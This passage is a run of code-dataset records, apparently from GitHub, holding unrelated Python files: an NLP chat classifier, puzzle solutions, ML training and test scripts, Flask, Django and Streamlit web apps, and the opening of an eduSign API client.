30)\n","repo_name":"Tiergarten/l2-orderbook-tops","sub_path":"tests/test_watch.py","file_name":"test_watch.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"39976327158","text":"import json\nimport re\nimport spacy\nimport numpy as np\nfrom autocorrect import spell\nfrom copy import deepcopy\nfrom os import path\nfrom os.path import basename\n\n# the ioid of this script for JSON payload 'from'\nioid = basename(__file__) # 'hello.py'\n# Load the spacy english model\nnlp = spacy.load('en')\n\nCONVO_CLASSES_PATH = path.join(\n path.dirname(__file__), '..', '..', 'data', 'convo_classes.json')\nCONVO_CLASSES = json.load(open(CONVO_CLASSES_PATH))\n\nMIN_SIM_THRESHOLD = 0.7\n\n\ndef vectorize_queries(convo_classes):\n for topic in convo_classes:\n topic_convo = convo_classes[topic]\n topic_convo['queries_wordvecs'] = []\n for q in topic_convo['queries']:\n q_vector = nlp(q)\n topic_convo['queries_wordvecs'].append(q_vector)\n return convo_classes\n\nvectorize_queries(CONVO_CLASSES)\n\n\n# helper to clean all text before operation\ndef clean_input(text):\n # first clean out symbols\n text = re.sub(r'[^\\w]', ' ', text)\n # then tokenize\n text = text.split()\n # then correct all spellings\n text = map(spell, text)\n text = \" \".join(text)\n return text\n\n\n# classify a conversation (topic) using wordvec\n# return a convo copy,\n# i.e. an object in convo_classes\ndef wordvec_classify(input_str):\n input_str = clean_input(input_str)\n input_v = nlp(input_str)\n high_score = 0\n high_topic = 'exception'\n org_convo = CONVO_CLASSES['exception'] # default\n for topic in CONVO_CLASSES:\n topic_convo = CONVO_CLASSES[topic]\n local_high_score = max([\n input_v.similarity(q_v) for q_v in topic_convo['queries_wordvecs']\n ]) if topic_convo['queries_wordvecs'] else 0\n if (local_high_score > high_score and\n local_high_score > MIN_SIM_THRESHOLD):\n high_score = local_high_score\n high_topic = topic\n org_convo = topic_convo\n convo = deepcopy(org_convo)\n convo['score'] = high_score\n convo['topic'] = high_topic\n return convo\n\n\ndef compose_response(convo):\n options = convo['responses']\n response = np.random.choice(options)\n return {\n 'score': convo['score'],\n 'topic': convo['topic'],\n 'response': response\n }\n\n\n# basic way to classify convo topic\n# then reply by predefined responses in data/convo_classes.json\ndef classify_convo(input_str):\n convo = wordvec_classify(input_str)\n response_payload = compose_response(convo)\n return response_payload\n\n\n# module method for socketIO\ndef classify(msg):\n # the reply JSON payload.\n reply = {\n 'output': classify_convo(msg.get('input')),\n 'to': msg.get('from'),\n 'from': ioid,\n 'hash': msg.get('hash')\n }\n # the py client will send this to target \n return reply\n","repo_name":"kengz/aiva","sub_path":"lib/py/convo_classifier.py","file_name":"convo_classifier.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":808,"dataset":"github-code","pt":"18"}
+{"seq_id":"12749441054","text":"import functools\nimport itertools\nimport re\n\nfrom sympy.core import numbers\n\nimport utils\n\n\nREVERSE_RE = r'deal into new stack'\nCUT_RE = r'cut (-?\\d+)'\nINCREMENT_RE = r'deal with increment (\\d+)'\n\n\n@functools.lru_cache(maxsize=None)\ndef inverse(n, k):\n return numbers.mod_inverse(k, n)\n\n\ndef mod(n, *coeffs):\n return tuple(coeff % n for coeff in coeffs)\n\n\nCOEFFS = {\n REVERSE_RE: lambda n, a, b: mod(n, -1 * a, -1 * b - 1),\n CUT_RE: lambda n, k, a, b: mod(n, a, b - k),\n INCREMENT_RE: lambda n, k, a, b: mod(n, a * k, b * k),\n}\n\nINV_COEFFS = {\n REVERSE_RE: lambda n, a, b: mod(n, -1 * a, -1 * b - 1),\n CUT_RE: lambda n, k, a, b: mod(n, a, b + k),\n INCREMENT_RE: lambda n, k, a, b: mod(n, a * inverse(n, k), b * inverse(n, k)),\n}\n\n\ndef get_coeffs(n, techniques, reverse=False):\n if reverse:\n techniques = techniques[::-1]\n coeff_map = INV_COEFFS\n else:\n coeff_map = COEFFS\n\n coeffs = (1, 0)\n for technique in techniques:\n for regex, method in coeff_map.items():\n match = re.match(regex, technique)\n if match:\n coeffs = method(*itertools.chain(\n [n],\n [int(arg) for arg in match.groups()],\n coeffs,\n ))\n\n return coeffs\n\n\ndef shuffle(n, card, rounds=1, reverse=False):\n techniques = utils.get_input(delimiter=None, cast=str)\n a, b = get_coeffs(n, techniques, reverse=reverse)\n return (\n pow(a, rounds, n) * card +\n b * (pow(a, rounds, n) - 1) * inverse(n, a - 1)\n ) % n\n\n\n@utils.part\ndef part_1():\n print(shuffle(10007, 2019))\n\n\n@utils.part\ndef part_2():\n print(shuffle(119315717514047, 2020, rounds=101741582076661, reverse=True))\n","repo_name":"alexander-yu/adventofcode","sub_path":"problems_2019/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"5238175569","text":"from turtle import Turtle, Screen\n\ntimmy = Turtle()\ntimmy.shape('turtle')\ntimmy.color('red')\n\n#draw a square \nfor _ in range(4):\n timmy.forward(100)\n timmy.right(90)\n\n \nscreen = Screen()\nscreen.exitonclick()\n","repo_name":"kmshravani/100DaysofCode","sub_path":"Day 18/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"7112812365","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n if not s:\n return 0\n dp = [[0 for i in range(len(s))] for j in range(len(s))]\n for i in range(len(s)):\n dp[i][i] = 1\n max_l = 1\n for r in range(2, len(s)+1):\n for i in range(len(s)-r+1):\n j = i + r - 1\n p1,p2 = 0,0\n if dp[i][j-1] == len(s[i:j]) and s[j] not in s[i:j]:\n p1 = dp[i][j-1]+1\n if dp[i+1][j] == len(s[i+1:j+1]) and s[i] not in s[i+1:j+1]:\n p2 = dp[i+1][j] + 1\n dp[i][j] = max(p1, p2, dp[i][j-1], dp[i+1][j])\n max_l = max(max_l, dp[i][j])\n # for d in dp:\n # print(d)\n # print(max_l)\n return max_l\n\n def lengthOfLongestSubstring1(self, s: str) -> int:\n i = 0\n max_l = 0\n while i < len(s):\n j = i + 1\n index_dic = {s[i]: i}\n while j < len(s) and s[j] not in index_dic:\n index_dic[s[j]] = j\n j += 1\n max_l = max(max_l, j-i)\n if j < len(s):\n i = index_dic[s[j]]+1\n else:\n break\n return max_l\n\n def lengthOfLongestSubstring2(self, s: str) -> int:\n occ = set()\n n = len(s)\n # 右指针,初始值为 -1,相当于我们在字符串的左边界的左侧,还没有开始移动\n rk, ans = -1, 0\n for i in range(n):\n if i != 0:\n # 左指针向右移动一格,移除一个字符\n occ.remove(s[i - 1])\n while rk + 1 < n and s[rk + 1] not in occ:\n # 不断地移动右指针\n occ.add(s[rk + 1])\n rk += 1\n # 第 i 到 rk 个字符是一个极长的无重复字符子串\n ans = max(ans, rk - i + 1)\n return ans\n\n def lengthOfLongestSubstring3(self, s: str) -> int:\n i = 0\n j = 1\n max_l = 1\n index_dic = {s[0]:0}\n while i < len(s):\n while j < len(s) and s[j] not in index_dic:\n index_dic[s[j]] = j\n j += 1\n max_l = max(max_l, j-i)\n if j < len(s):\n new_i = index_dic[s[j]] + 1\n for k in range(i, new_i):\n index_dic.pop(s[k])\n i = new_i\n else:\n break\n return max_l\nif __name__ == '__main__':\n s = \"pwwkew\"\n s = \"abcabcbb\"\n a = Solution()\n a.lengthOfLongestSubstring3(s)\n\n","repo_name":"longkun-uestc/examination","sub_path":"力扣网/3-无重复字符的最长子串.py","file_name":"3-无重复字符的最长子串.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"12088384145","text":"\"\"\"Example script to train the DNC on a repeated copy task.\"\"\"\nimport os\nimport argparse\nimport logging\n\nimport torch\nfrom dnc.repeat_copy import RepeatCopy\nfrom dnc.dnc import DNC\n\n_LG = logging.getLogger(__name__)\n\n\ndef _main():\n args = _parse_args()\n logging.basicConfig(level=logging.INFO, format=\"%(asctime)s: %(message)s\")\n\n dataset = RepeatCopy(\n args.num_bits,\n args.batch_size,\n args.min_length,\n args.max_length,\n args.min_repeats,\n args.max_repeats,\n )\n\n dnc = DNC(\n access_config={\n \"memory_size\": args.memory_size,\n \"word_size\": args.word_size,\n \"num_reads\": args.num_read_heads,\n \"num_writes\": args.num_write_heads,\n },\n controller_config={\n \"input_size\": args.num_bits + 2 + args.num_read_heads * args.word_size,\n \"hidden_size\": args.hidden_size,\n },\n output_size=dataset.target_size,\n clip_value=args.clip_value,\n ).to(args.device)\n\n optimizer = torch.optim.RMSprop(dnc.parameters(), lr=args.lr, eps=args.eps)\n\n _run_train_loop(\n dnc,\n dataset,\n optimizer,\n args.num_training_iterations,\n args.report_interval,\n args.checkpoint_interval,\n args.checkpoint_dir,\n args.device,\n )\n\n\ndef _run_train_loop(\n dnc,\n dataset,\n optimizer,\n num_training,\n report_interval,\n checkpoint_interval,\n checkpoint_dir,\n device,\n):\n total_loss = 0\n for i in range(num_training):\n batch = dataset(device=device)\n state = None\n outputs = []\n for inputs in batch.observations:\n output, state = dnc(inputs, state)\n outputs.append(output)\n outputs = torch.stack(outputs, 0)\n loss = dataset.cost(outputs, batch.target, batch.mask)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n total_loss += loss.item()\n if (i + 1) % report_interval == 0:\n outputs = torch.round(batch.mask.unsqueeze(-1) * torch.sigmoid(outputs))\n dataset_string = dataset.to_human_readable(batch, outputs)\n _LG.info(f\"{i}: Avg training loss {total_loss / report_interval}\")\n _LG.info(dataset_string)\n total_loss = 0\n if checkpoint_interval is not None and (i + 1) % checkpoint_interval == 0:\n path = os.path.join(checkpoint_dir, \"model.pt\")\n torch.save(dnc.state_dict(), path)\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=__doc__,\n )\n model_opts = parser.add_argument_group(\"Model Parameters\")\n model_opts.add_argument(\n \"--hidden-size\", type=int, default=64, help=\"Size of LSTM hidden layer.\"\n )\n model_opts.add_argument(\n \"--memory-size\", type=int, default=16, help=\"The number of memory slots.\"\n )\n model_opts.add_argument(\n \"--word-size\", type=int, default=16, help=\"The width of each memory slot.\"\n )\n model_opts.add_argument(\n \"--num-write-heads\", type=int, default=1, help=\"Number of memory write heads.\"\n )\n model_opts.add_argument(\n \"--num-read-heads\", type=int, default=4, help=\"Number of memory read heads.\"\n )\n model_opts.add_argument(\n \"--clip-value\",\n type=float,\n default=20,\n help=\"Maximum absolute value of controller and dnc outputs.\",\n )\n\n optim_opts = parser.add_argument_group(\"Optimizer Parameters\")\n optim_opts.add_argument(\n \"--max-grad-norm\", type=float, default=50, help=\"Gradient clipping norm limit.\"\n )\n optim_opts.add_argument(\n \"--learning-rate\",\n \"--lr\",\n type=float,\n default=1e-4,\n dest=\"lr\",\n help=\"Optimizer learning rate.\",\n )\n optim_opts.add_argument(\n \"--optimizer-epsilon\",\n type=float,\n default=1e-10,\n dest=\"eps\",\n help=\"Epsilon used for RMSProp optimizer.\",\n )\n\n task_opts = parser.add_argument_group(\"Task Parameters\")\n task_opts.add_argument(\n \"--batch-size\", type=int, default=16, help=\"Batch size for training\"\n )\n task_opts.add_argument(\n \"--num-bits\", type=int, default=4, help=\"Dimensionality of each vector to copy\"\n )\n task_opts.add_argument(\n \"--min-length\",\n type=int,\n default=1,\n help=\"Lower limit on number of vectors in the observation pattern to copy\",\n )\n task_opts.add_argument(\n \"--max-length\",\n type=int,\n default=2,\n help=\"Upper limit on number of vectors in the observation pattern to copy\",\n )\n task_opts.add_argument(\n \"--min-repeats\",\n type=int,\n default=1,\n help=\"Lower limit on number of copy repeats.\",\n )\n task_opts.add_argument(\n \"--max-repeats\",\n type=int,\n default=2,\n help=\"Upper limit on number of copy repeats.\",\n )\n\n train_opts = parser.add_argument_group(\"Training Options\")\n train_opts.add_argument(\n \"--device\",\n type=torch.device,\n default=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n help=\"Device to perform the training.\",\n )\n train_opts.add_argument(\n \"--num-training-iterations\",\n type=int,\n default=100_000,\n help=\"Number of iterations to train for.\",\n )\n train_opts.add_argument(\n \"--report-interval\",\n type=int,\n default=100,\n help=\"Iterations between reports (samples, valid loss).\",\n )\n train_opts.add_argument(\n \"--checkpoint-dir\", default=None, help=\"Checkpointing directory.\"\n )\n train_opts.add_argument(\n \"--checkpoint-interval\",\n type=int,\n default=None,\n help=\"Checkpointing step interval.\",\n )\n args = parser.parse_args()\n\n if args.checkpoint_dir is None and args.checkpoint_interval is not None:\n raise RuntimeError(\n \"`--checkpoint-dir` is provided but `--checkpoint-interval` is not provided.\"\n )\n if args.checkpoint_dir is not None and args.checkpoint_interval is None:\n raise RuntimeError(\n \"`--checkpoint-interval` is provided but `--checkpoint-dir` is not provided.\"\n )\n return args\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"mthrok/dnc_pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"28698725430","text":"'''\n如何派生内置不可变类型并修改其实例化行为\n'''\n\nclass IntTuple(tuple): #跟原本的tuple是一样的\n def __init__(self,iterable):\n super(IntTuple,self).__init__(iterable)\n\n'''翻译__new__和__init__'''\nlist('abc') #下面两句等于加起来等于list('abc')\n\nl=list.__new__(list,'abc')\nlist.__init__(l,'abc')\nprint(l)\n\n'''使用__new__方法'''\nclass IntTuple(tuple):\n def __new__(cls, iterable):\n g=(x for x in iterable if isinstance(x,int) and x>0)\n # return super().__new__(cls, g)\n return super(IntTuple,cls).__new__(cls,g) #两句一样\n\nt=IntTuple([1,-1,'abc',6,['x','y'],3])\nprint(t)","repo_name":"Air-Zhuang/Test35","sub_path":"High_Level_Coding_python3/7/7_1.py","file_name":"7_1.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"25097888646","text":"import numpy as np\nimport pytest\nimport torch\nfrom jina import Document, DocumentArray\n\nfrom finetuner import __default_tag_key__\nfrom finetuner.tuner.evaluation import (\n METRICS,\n Evaluator,\n __evaluator_metrics_key__,\n __evaluator_targets_key__,\n)\n\nDATASET_SIZE = 1000\nEMBEDDING_SIZE = 10\n\n\nclass EmbeddingModel(torch.nn.Module):\n @staticmethod\n def forward(inputs):\n return inputs.repeat(1, 10)\n\n\n@pytest.fixture\ndef embed_model():\n \"\"\"The embedding model\"\"\"\n return EmbeddingModel()\n\n\n@pytest.fixture\ndef query_session_data():\n \"\"\"The query data in session format\"\"\"\n data = DocumentArray()\n for i in range(DATASET_SIZE):\n doc = Document(\n id=str(i),\n blob=np.array([i]),\n matches=[Document(id=str(DATASET_SIZE + i))],\n )\n data.append(doc)\n return data\n\n\n@pytest.fixture\ndef index_session_data():\n \"\"\"The index data in session format\"\"\"\n return DocumentArray(\n [\n Document(id=str(DATASET_SIZE + i), blob=np.array([i]))\n for i in range(DATASET_SIZE)\n ]\n )\n\n\n@pytest.fixture\ndef query_class_data():\n \"\"\"The query data in class format\"\"\"\n return DocumentArray(\n Document(id=str(i), blob=np.array([i]), tags={__default_tag_key__: str(i)})\n for i in range(DATASET_SIZE)\n )\n\n\n@pytest.fixture\ndef index_class_data():\n \"\"\"The index data in class format\"\"\"\n return DocumentArray(\n Document(\n id=str(DATASET_SIZE + i),\n blob=np.array([i]),\n tags={__default_tag_key__: str(i)},\n )\n for i in range(DATASET_SIZE)\n )\n\n\ndef test_parse_session_docs(query_session_data, index_session_data):\n \"\"\"\n Test the conversion from session docs to the internal evaluator representation\n \"\"\"\n evaluator = Evaluator(query_session_data, index_session_data)\n summarydocs = evaluator._parse_session_docs()\n for evaldoc, summarydoc in zip(query_session_data, summarydocs):\n assert evaldoc.id == summarydoc.id\n assert summarydoc.content is None\n assert evaldoc.matches[0].id in summarydoc.tags[__evaluator_targets_key__]\n assert summarydoc.tags[__evaluator_targets_key__][evaldoc.matches[0].id] == 1\n\n\ndef test_parse_class_docs(query_class_data, index_class_data):\n \"\"\"\n Test the conversion from class docs to the internal evaluator representation\n \"\"\"\n evaluator = Evaluator(query_class_data, index_class_data)\n summarydocs = evaluator._parse_class_docs()\n for evaldoc, summarydoc in zip(query_class_data, summarydocs):\n assert evaldoc.id == summarydoc.id\n assert summarydoc.content is None\n targets = list(summarydoc.tags[__evaluator_targets_key__].items())\n assert len(targets) == 1\n target, relevance = targets[0]\n assert relevance == 1\n\n\ndef test_list_available_metrics(embed_model):\n \"\"\"\n Test the listing of available metrics\n \"\"\"\n assert Evaluator.list_available_metrics() == list(METRICS.keys())\n\n\ndef test_evaluator_perfect_scores(\n embed_model,\n query_session_data,\n index_session_data,\n query_class_data,\n index_class_data,\n):\n \"\"\"\n Test the evaluator when the matching limit is set 1. We expect all metrics == 1.0\n \"\"\"\n # test both for session and class data\n for _query_data, _index_data in [\n (query_session_data, index_session_data),\n (query_class_data, index_class_data),\n ]:\n evaluator = Evaluator(_query_data, _index_data, embed_model)\n metrics = evaluator.evaluate(label='foo', limit=1, distance='euclidean')\n print(metrics)\n for _, v in metrics.items():\n assert v == 1.0\n for doc in _query_data:\n for _, v in doc.tags[__evaluator_metrics_key__]['foo'].items():\n assert v == 1.0\n\n\ndef test_evaluator_half_precision(\n embed_model,\n query_session_data,\n index_session_data,\n query_class_data,\n index_class_data,\n):\n \"\"\"\n Test the evaluator when the matching limit is set 2. We expect all metrics == 1.0 except\n precision == 0.5 and f1score == 2/3\n \"\"\"\n # test both for session and class data\n for _query_data, _index_data in [\n (query_session_data, index_session_data),\n (query_class_data, index_class_data),\n ]:\n evaluator = Evaluator(_query_data, _index_data, embed_model)\n metrics = evaluator.evaluate(label='foo', limit=2, distance='euclidean')\n for k, v in metrics.items():\n if k == 'precision_at_k':\n assert v == 0.5\n elif k == 'f1_score_at_k':\n assert 0.66 < v < 0.67\n else:\n assert v == 1.0\n for doc in _query_data:\n for k, v in doc.tags[__evaluator_metrics_key__]['foo'].items():\n if k == 'precision_at_k':\n assert v == 0.5\n elif k == 'f1_score_at_k':\n assert 0.66 < v < 0.67\n else:\n assert v == 1.0\n\n\ndef test_evaluator_no_index_data(embed_model, query_class_data):\n \"\"\"\n Test the evaluator when no index data are given\n \"\"\"\n evaluator = Evaluator(query_class_data, embed_model=embed_model)\n _ = evaluator.evaluate()\n","repo_name":"ajjurcom/finetuner","sub_path":"tests/unit/tuner/test_evaluation.py","file_name":"test_evaluation.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"17036768259","text":"from flask import Flask, render_template\nfrom . import *\n\n\napp = Flask(__name__)\napp.config.from_object('config')\n\n@app.route('/')\n@app.route('/index/')\ndef index():\n return render_template('index.html')\n@app.route('/result/')\ndef result():\n description = \"\"\"\n Toi, tu n'as pas peur d'être seul ! Les grands espaces et les aventures sont faits pour toi. D'ailleurs, Koh Lanta est ton émission préférée ! Bientôt tu partiras les cheveux au vent sur ton radeau. Tu es aussi un idéaliste chevronné. Quelle chance !\n \"\"\"\n return render_template('result.html', user_name = \"eder\", user_image=url_for('static', filename='tmp/cover_111823112767411.jpg'),\n description=description, blur=True)\n\n\nif __name__ == \"__main__\":\n app.run(port=8012)","repo_name":"Nicolas-Turck/flask1","sub_path":"fbapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14683758092","text":"from scene import *\nfrom Draw_line import my_line\nfrom sound import play_effect\n\n\npic = Texture('mou1.JPG')\nfont = ('Apple Color Emoji',25)\nclass myscene(Scene) :\n\tdef setup(self) :\n\t\tself.background_color = '#f868ff'\n\t\t\n\t\tself.pic_node = SpriteNode(pic,parent=self)\n\t\tself.pic_node.anchor_point=(0.5,0.5)\n\t\tself.pic_node.position=(self.size.w/2,self.size.h/2)\n\t\tself.pic_node.scale=0.5\n\t\t\n\t\tline,pos=my_line(100,100,300,300)\n\t\tself.lin_node = ShapeNode(line,stroke_color='#6875ff',parent=self)\n\t\tself.lin_node.position=pos\n\t\t\n\t\tself.txt_node = LabelNode('Hello,this is stan',font,parent=self)\n\t\tself.txt_node.position = (self.size.w/2,4*self.size.h/5)\n\t\tself.txt_node.color='#ff4646'\n\t\t\n\tdef touch_moved(self,touch) :\n\t\tx,y=touch.location\n\t\tself.pic_node.position=touch.location\n\t\tplay_effect('8ve:8ve-slide-network',2)\n\t\t\n\t\t\n\tdef touch_began(self,touch) :\n\t\tself.txt_node.position=touch.location\n\t\tplay_effect('digital:HighDown',0.1)\n\tdef touch_ended(self,touch) :\n\t\tself.lin_node.position=touch.location\n\t\tplay_effect('digital:HighUp',0.5)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\nrun(myscene(),PORTRAIT,show_fps=True)\n","repo_name":"stan12138/archive","sub_path":"script/pythonista/scene_example.py","file_name":"scene_example.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"73040974119","text":"import pandas as pd\nimport argparse\n\ndef main():\n df = pd.read_csv('/home/hanieh/car/bama.csv')\n m = df.value_counts([\"brand\", \"model\"])\n print(type(m))\n m.to_csv('/home/hanieh/car/counter.csv')\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv_path', type=str, help='path of csv file ', default='/home/hanieh/car/bama.csv')\n parser.add_argument('--result', type=str, help='path of result file', default='/home/hanieh/car/counter.csv')\n\n arguments = parser.parse_args()\n return arguments\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n main()","repo_name":"haniehakhavan/car-detection","sub_path":"count cars.py","file_name":"count cars.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"11484920302","text":"import re\nfrom django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom django.http import JsonResponse\n\n# Create your views here.\nfrom django.contrib.auth.models import User\nfrom rest_framework.response import Response\nfrom .serializers import user_serializer,login_serializer,docs_serializer,appointment_serializer\nfrom rest_framework import status\nfrom users.models import *\n\n@api_view(['GET'])\ndef current_users(request):\n users=User.objects.all();\n users_json=user_serializer(users,many=True);\n print(users_json)\n return Response(users_json.data)\n \n \n@api_view(['POST'])\ndef add_users(request):\n user=request.data\n print(user)\n users_json=None\n if user:\n User.objects.create(username=user['name'],email=user['email'])\n User.save\n u=User.objects.get(username=user['name'])\n users_json=user_serializer(u,many=False)\n \n \n return Response(users_json.data, status=status.HTTP_200_OK)\n\n@api_view(['POST'])\ndef login_auth(request):\n user=request.data\n login_user=User.objects.get(email=user['email'])\n print(login_user)\n if login_user:\n u=user_serializer(login_user,many=False)\n return Response(u.data,status=status.HTTP_200_OK)\n\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef getDoctors(request):\n docs=doctors.objects.all()\n docs_json=docs_serializer(docs,many=True)\n return Response(docs_json.data,status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef get_appointments(request,id):\n user_appointments=appointments.objects.filter(user=id);\n json=appointment_serializer(user_appointments,many=True);\n print(json)\n return Response(json.data)\n\n@api_view(['GET'])\ndef get_appointment(request,id):\n appointment=appointments.objects.get(id=id);\n json=appointment_serializer(appointment,many=False)\n return Response(json.data)\n\n@api_view(['GET'])\ndef get_doctor(request,id):\n doctor=doctors.objects.get(id=id);\n json=docs_serializer(doctor,many=False);\n return Response(json.data)\n\n@api_view(['DELETE'])\ndef delete_appointment(request,id):\n print(id)\n appointments.objects.get(id=id).delete()\n return Response(status=status.HTTP_200_OK)\n\n@api_view(['POST'])\ndef add_appointment(request):\n data=request.data\n app=doctors.objects.get(id=data['doctor_id'])\n u=User.objects.get(id=data['user_id'])\n appointments.objects.create(user=u,doctor=app,time=data['appointment_date'])\n return Response(status=status.HTTP_200_OK)\n \n\n \n \n ","repo_name":"DeepakGonugunta/sdp4","sub_path":"djangorest/one/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4372033058","text":"import streamlit as st\nfrom utils.utils import *\nfrom datetime import time\n\ndef create_form():\n weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']\n avaiable_codc=list()\n for row in execute_query(conn=st.session_state[\"connection\"],\n query=\"SELECT CodC FROM Corsi;\"):\n avaiable_codc.append(row[0])\n avaiable_codf=list()\n for row in execute_query(conn=st.session_state[\"connection\"],\n query=\"SELECT CodFisc FROM Istruttore;\"):\n avaiable_codf.append(row[0])\n\n\n with st.form(\"New scheduled lesson\"):\n codf=st.selectbox(label=\"Trainer ID code selection\", options=avaiable_codf)\n cols = st.columns(5)\n with cols[0]:\n codc=st.selectbox(label=\"Course selection\", options=avaiable_codc)\n with cols[1]:\n giorno=st.selectbox(label=\"Course day selection \", options=weekdays)\n with cols[2]:\n orainizio=st.time_input(label=\"Start time selection\", step=300, value=time(hour=8))\n with cols[3]:\n durata=st.number_input(label=\"Course duration\", max_value=60, step=5, min_value=5, value=30)\n with cols[4]:\n sala=st.text_input(label=\"Room number\", max_chars=5, placeholder=\"S****\")\n \n submitted= st.form_submit_button(\"Submit\", type='primary')\n\n if submitted: \n if sala=='': \n st.warning(body=\"Insert the room number first.\")\n else:\n overlaps=execute_query(conn=st.session_state[\"connection\"], \n query=f\"SELECT STR_TO_DATE(OraInizio, '%H:%i:%s') as OraInizio, DATE_ADD(STR_TO_DATE(OraInizio, '%H:%i:%s'), INTERVAL Durata MINUTE) as OraFine FROM Programma WHERE CodC='{codc}' AND Giorno='{giorno}' ORDER BY OraInizio, Durata;\")\n flag=True\n for row in overlaps:\n if not (time_to_seconds(orainizio, durata)<=row[0].total_seconds() or time_to_seconds(orainizio,0)>=row[1].total_seconds()):\n flag=False\n\n if flag==False:\n st.error(body=\"There's at least another scheduled lesson for the same course that overlap with the selected time.\")\n else:\n execute_query(conn=st.session_state[\"connection\"],\n query=f\"INSERT INTO Programma (CodFisc, Giorno, OraInizio, Durata, Sala, CodC) VALUES ('{codf}','{giorno}','{orainizio}',{durata},'{sala}','{codc}');\")\n st.success(body=\"Insertion to database successful.\")\n\nif __name__ == \"__main__\":\n st.title(\":green[Add new scheduled lesson for a specific course]\")\n if check_connection() is not False:\n create_form()","repo_name":"erikscolaro/MySQL-streamlit_training_project","sub_path":"pages/5_Add_new_lesson.py","file_name":"5_Add_new_lesson.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4092752056","text":"\nimport os\nimport numpy as np\n\nfrom sverchok.utils.math import inverse, inverse_square, inverse_cubic\n\ndef show_welcome():\n text = r\"\"\"\n\n ________ .___ _________\n / _____/ | | / _____/\n/ \\ ___ | | \\_____ \\ \n\\ \\_\\ \\ | | / \\ nodes for Sverchok\n \\______ / |___| /_______ /\n \\/ \\/ \n initialized.\n\n\"\"\"\n can_paint = os.name in {'posix'}\n\n with_color = \"\\033[1;31m{0}\\033[0m\" if can_paint else \"{0}\"\n for line in text.splitlines():\n print(with_color.format(line))\n\n\ndef register_class_factory_deps(classes, deps=None):\n \"\"\"\n usage\n from sverchok_gis.utils import registration_class_factory_deps\n\n classes = [SvSGNImportGeometryLine]\n register, unregister = sverchok.utils.registration_class_factory_deps(classes, deps=[gpd])\n\n \"\"\"\n import bpy\n\n if not deps:\n return bpy.utils.register_classes_factory(classes)\n\n\n def register():\n if all(deps):\n _ = [bpy.utils.register_class(c) for c in classes]\n\n def unregister():\n if all(deps):\n _ = [bpy.utils.unregister_class(c) for c in reversed(classes)]\n\n return register, unregister\n\n\n","repo_name":"Marcus-Richmond/sverchok-gis-nodes","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"14127415072","text":"import json\nimport uuid\nfrom pprint import pformat\nfrom urllib.parse import urljoin\n\nimport requests\nfrom flask import current_app, session, url_for\nfrom requests.auth import HTTPBasicAuth\n\nfrom edusign_webapp.utils import get_authn_context\n\n\ndef pretty_print_req(req: requests.PreparedRequest) -> str:\n \"\"\"\n Pretty print `requests.PreparedRequest`, used for logging\n\n :param req: The request to print\n :return: Pretty printed reepresentation of the request\n \"\"\"\n return '{}\\n{}\\r\\n{}\\r\\n\\r\\n{}'.format(\n '-----------START-----------',\n str(req.method) + ' ' + str(req.url),\n '\\r\\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),\n str(req.body)[:100],\n )\n\n\nclass APIClient(object):\n \"\"\"\n Class holding methods to communicate with the Signature Service Integration REST-Service.\n\n Instances of `edusign_webapp.run.EduSignApp` Flask app has a property `api_client` that is an\n instance of this class.\n \"\"\"\n\n class ExpiredCache(Exception):\n \"\"\"\n When the client sends a document to the API to be prepared, the API will keep it\n in its cache for a configurable amount of time (15 minutes by default). Afterwards\n it will be removed.\n If the client tries to create a sign request referencing a document that has been\n removed from the cache, it will obtain an error response. So it uses this exception\n to signal such condition, to indicate that it is necessary to prepare the document\n again before trying to continue with the signing process.\n \"\"\"\n\n pass\n\n def __init__(self, config: dict):\n \"\"\"\n 